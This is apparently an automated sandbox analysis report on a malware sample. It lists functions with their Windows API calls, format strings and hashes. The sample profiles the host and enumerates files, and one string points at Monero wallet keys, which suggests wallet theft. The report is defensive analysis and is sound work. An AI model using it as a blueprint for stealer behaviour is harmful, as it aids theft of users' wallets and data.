Instruction ID: 697ab666dcfe39e3c6c4d5976017f256bd4f0e08691345a3970b87aa2d44da15
Opcode Fuzzy Hash: 153c93ea07b6f1fbb4d218468b560e3e9c8b7d371fd293ccf85f86fc42739704
Instruction Fuzzy Hash: FC019F76900108A7DB54F7B4DC87DDE737CFB64300F004554B645D6191EE74A689CB93

Function 008A10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008A10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008A10F7

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 07691884c1e7cdded092ab148d12a0d844a1c309b0a090245bad014cfb379c20
Instruction ID: 34f5bae465d8c4251847826dd5a883328f74f600a485731d1c9d8bb3d7bfe7d5
Opcode Fuzzy Hash: 07691884c1e7cdded092ab148d12a0d844a1c309b0a090245bad014cfb379c20
Instruction Fuzzy Hash: 03F0E271641208BBEB14DAA8AC89FAAB7ECE705B15F300448F604E7280D571AE00CBA1

Function 008B8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,008A1B54,?,?,008C564C,?,?,008C0E1F), ref: 008B8D9F

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: f381e68bcea8843e2f1a25185715d85feff154677fb19b08b6caa3a875c4c5e5
Instruction ID: 49ecb84c24dc5255dd83567649452776782117bab5dc3a837a72011264c62d5a
Opcode Fuzzy Hash: f381e68bcea8843e2f1a25185715d85feff154677fb19b08b6caa3a875c4c5e5
Instruction Fuzzy Hash: C0F0AC70C0020CEBCB14EF94D5556DCBB74FB10314F14819AD855A73D0DB745A55DF81

Function 008B8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008B8E0B

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 5ab34abc99f563be7722e196d8957988efc14aa9d7237396ba875a4290b0a930
Instruction ID: 65dcba5a67b2baad7d66dfc47113e22827d2c296419c104863244435055c90c8
Opcode Fuzzy Hash: 5ab34abc99f563be7722e196d8957988efc14aa9d7237396ba875a4290b0a930
Instruction Fuzzy Hash: B1E0123194034C7BDB51EB94DC96FED777CEB44B01F004295BA0C9A1C0DE70AB858B92

Function 008A1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B7910
Part of subcall function 008B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008B7917
Part of subcall function 008B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008B792F

Part of subcall function 008B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008A11B7), ref: 008B7880
Part of subcall function 008B7850: RtlAllocateHeap.NTDLL(00000000), ref: 008B7887
Part of subcall function 008B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008B789F

ExitProcess.KERNEL32 ref: 008A11C6

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 9eecff8197b86b84384c96d419baf4b0eeb35d9d7f8ef1971ac208b8b73e920d
Instruction ID: 24defdd9049a7b4623bb2ac3d716d3ec174f895e1ab7cc0b1aa8b7f3413ee0fe
Opcode Fuzzy Hash: 9eecff8197b86b84384c96d419baf4b0eeb35d9d7f8ef1971ac208b8b73e920d
Instruction Fuzzy Hash: 6EE012B595434153DE00B3F8AC4AB6A369CFB65385F041424FA09D6702FA25F802C66F

Non-executed Functions

Function 008B38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008B38CC
FindFirstFileA.KERNEL32(?,?), ref: 008B38E3
lstrcat.KERNEL32(?,?), ref: 008B3935
StrCmpCA.SHLWAPI(?,008C0F70), ref: 008B3947
StrCmpCA.SHLWAPI(?,008C0F74), ref: 008B395D
FindNextFileA.KERNEL32(000000FF,?), ref: 008B3C67
FindClose.KERNEL32(000000FF), ref: 008B3C7C

Strings

%s\%s, xrefs: 008B397A
%s\%s\%s, xrefs: 008B3A4A
%s\%s, xrefs: 008B3A6F
%s\*, xrefs: 008B38C0
%s%s, xrefs: 008B3AAD

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: c9d3928ded701aaa8b11ef1e1efef5e16dbe37df90c15f9535ac92d45cfb398a
Instruction ID: a537964d9717eae87f9807420d0253b0109070f0576256bda3cb1e5d799293ba
Opcode Fuzzy Hash: c9d3928ded701aaa8b11ef1e1efef5e16dbe37df90c15f9535ac92d45cfb398a
Instruction Fuzzy Hash: C5A150B1A00258ABDB24DFA4DC85FEE7778FB59300F044588B51DD6241EB74AB85CF62

Function 008B4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008B4580
RtlAllocateHeap.NTDLL(00000000), ref: 008B4587
wsprintfA.USER32 ref: 008B45A6
FindFirstFileA.KERNEL32(?,?), ref: 008B45BD
StrCmpCA.SHLWAPI(?,008C0FC4), ref: 008B45EB
StrCmpCA.SHLWAPI(?,008C0FC8), ref: 008B4601
FindNextFileA.KERNEL32(000000FF,?), ref: 008B468B
FindClose.KERNEL32(000000FF), ref: 008B46A0
lstrcat.KERNEL32(?,0127E9D0), ref: 008B46C5
lstrcat.KERNEL32(?,0127DCD8), ref: 008B46D8
lstrlen.KERNEL32(?), ref: 008B46E5
lstrlen.KERNEL32(?), ref: 008B46F6

Strings

%s\*, xrefs: 008B459A
%s\%s, xrefs: 008B461B

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 9304946b7a46376a8867ea99c14e38a8e9b9a78fb64e6167e52b45f556cfc32d
Instruction ID: f670dfc0e2ecbeb2ab2ffec243740e5e078d8819b65041b4f172fdfa597c7549
Opcode Fuzzy Hash: 9304946b7a46376a8867ea99c14e38a8e9b9a78fb64e6167e52b45f556cfc32d
Instruction Fuzzy Hash: 145156B59102189BDB24EBB4DC89FE9777CFB64300F404588B609D6191EF74AB85CF92

Function 008AED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 008AED3E
FindFirstFileA.KERNEL32(?,?), ref: 008AED55
StrCmpCA.SHLWAPI(?,008C1538), ref: 008AEDAB
StrCmpCA.SHLWAPI(?,008C153C), ref: 008AEDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 008AF2AE
FindClose.KERNEL32(000000FF), ref: 008AF2C3

Strings

%s\*.*, xrefs: 008AED32

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000095D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000982000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000098F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000A6B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000AEA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000AFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000C87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979035573.0000000000D9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979303253.0000000000D9E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979427856.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1979449001.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 05ce717e7cc0795b692cc0b5ae09086297361dfd14b79a32842868465adf0951
Instruction ID: 65c5054547cc38b3a23f184bbdef3623e51e96cc2efd95dadfd8c9fd09f26729
Opcode Fuzzy Hash: 05ce717e7cc0795b692cc0b5ae09086297361dfd14b79a32842868465adf0951
Instruction Fuzzy Hash: 08E1C271911118AAEB68FB64DC91EEE7338FF54300F4045A9B51AE2552EE306F8ACF53

Function 008ADE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008BA740: lstrcpy.KERNEL32(008C0E17,00000000), ref: 008BA788

Part of subcall function 008BA9B0: lstrlen.KERNEL32(?,01278E88,?,\Monero\wallet.keys,008C0E17), ref: 008BA9C5
Part of subcall function 008BA9B0: lstrcpy.KERNEL32(00000000), ref: 008BAA04
Part of subcall function 008BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008BAA12

Part of subcall function 008BA8A0: lstrcpy.KERNEL32(?,008C0E17), ref: 008BA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,008C0C2E), ref: 008ADE5E
StrCmpCA.SHLWAPI(?,008C14C8), ref: 008ADEAE
StrCmpCA.SHLWAPI(?,008C14CC), ref: 008ADEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 008AE3E0
FindClose.KERNEL32(000000FF), ref: 008AE3F2

Strings

\*.*, xrefs: 008ADE26

Memory Dump Source

Source File: 00000000.00000002.1978609767.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.1978592480.00000000008A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.00000000008FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000928000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.000000000092F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1978609767.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
